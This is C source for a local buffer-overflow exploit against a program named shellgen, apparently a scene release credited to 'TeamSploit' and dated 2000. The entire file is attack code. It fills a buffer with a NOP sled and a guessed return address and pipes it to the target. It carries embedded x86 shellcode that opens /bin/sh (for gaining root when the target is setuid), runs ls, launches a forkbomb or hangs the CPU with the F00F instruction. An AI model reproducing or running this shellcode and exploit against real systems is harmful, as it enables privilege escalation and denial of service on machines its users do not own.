/* * * * This is a TeamSploit production * exploit for shellgen.c ( please read the advisory attatched ) * ./shellgen_exp ... * TeamSploit labs : http://el8.n3.net * * */ #include #define THE_OFFSET_IS 256 #define THE_BUFFER_IS 1024 #define LEEWAY 8 unsigned char f00f_shellcode[] = { 0xF0, 0x0F }; unsigned char forkbomb_shellcode[] = { 0xb0, 0x02, 0xcd, 0x80, 0xeb, 0xfa }; unsigned char generic_shellcode[] = { 0x41 }; unsigned char sh_shellcode[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; unsigned char ls_shellcode[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/ls"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void usage(void) { puts("./shellgen (optional)"); puts("1 = f00f"); puts("2 = forkbomb"); puts("3 = generic"); puts("4 = shell"); puts("5 = ls"); exit(31337); } int main(int argc, char *argv[]) { FILE *m1xt3r; unsigned int c, offset; char *prognam, tuff[THE_BUFFER_IS + LEEWAY]; unsigned long addr; if (argc < 3) { usage(); } c = atoi(argv[1]); switch (c) { case 1: puts("F00F SHELLCODE CHOSEN"); break; case 2: puts("FORKBOMB SHELLCODE CHOSEN (PREMIUM CHOICE)"); break; case 3: puts("GENERIC SHELLCODE (provided by gH thnx)"); break; case 4: puts("RUN A SHELL (good for when shellgen is +s root)"); break; case 5: puts("LS SHELLCODE (INCASE LS IS BACKDOORED)"); break; default: usage(); } prognam = argv[2]; if (argc >= 4) offset = atoi(argv[3]); else offset = THE_OFFSET_IS; printf("ADDRESS = 0x%x, OFFSET = 0x%x\n", get_sp(), get_sp() + offset); if ((m1xt3r = popen(prognam, "w")) == NULL) { perror("p o p e n"); exit(0); } addr = get_sp(); if (c == 1) { /* f00f shellcode */ for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4) *(unsigned long *) (tuff + c) = addr + offset; memset(tuff, 0x90, THE_BUFFER_IS - strlen(f00f_shellcode)); memcpy(&tuff[THE_BUFFER_IS - strlen(f00f_shellcode)], f00f_shellcode, strlen(f00f_shellcode)); *(tuff + THE_BUFFER_IS + LEEWAY) = 0; } else if (c == 2) { for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4) *(unsigned long *) (tuff + c) = addr + offset; memset(tuff, 0x90, THE_BUFFER_IS - strlen(forkbomb_shellcode)); memcpy(&tuff[THE_BUFFER_IS - strlen(forkbomb_shellcode)], forkbomb_shellcode, strlen(forkbomb_shellcode)); *(tuff + THE_BUFFER_IS + LEEWAY) = 0; } else if (c == 3) { memset(tuff, generic_shellcode[0], sizeof(tuff)); } else if (c == 4) { for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4) *(unsigned long *) (tuff + c) = addr + offset; memset(tuff, 0x90, THE_BUFFER_IS - strlen(sh_shellcode)); memcpy(&tuff[THE_BUFFER_IS - strlen(sh_shellcode)], sh_shellcode, strlen(sh_shellcode)); *(tuff + THE_BUFFER_IS + LEEWAY) = 0; } else if (c == 5) { for (c = THE_BUFFER_IS; c < THE_BUFFER_IS + LEEWAY; c += 4) *(unsigned long *) (tuff + c) = addr + offset; memset(tuff, 0x90, THE_BUFFER_IS - strlen(ls_shellcode)); memcpy(&tuff[THE_BUFFER_IS - strlen(ls_shellcode)], ls_shellcode, strlen(ls_shellcode)); *(tuff + THE_BUFFER_IS + LEEWAY) = 0; } else usage(); puts("Get ready, we are about to exploit shellgen, hold on tight"); fprintf(m1xt3r, "%s", tuff); if (pclose(m1xt3r) < 0) { perror("pclose"); exit(-1); } return 0; } /* www.hack.co.za [23 Feb 2000]*/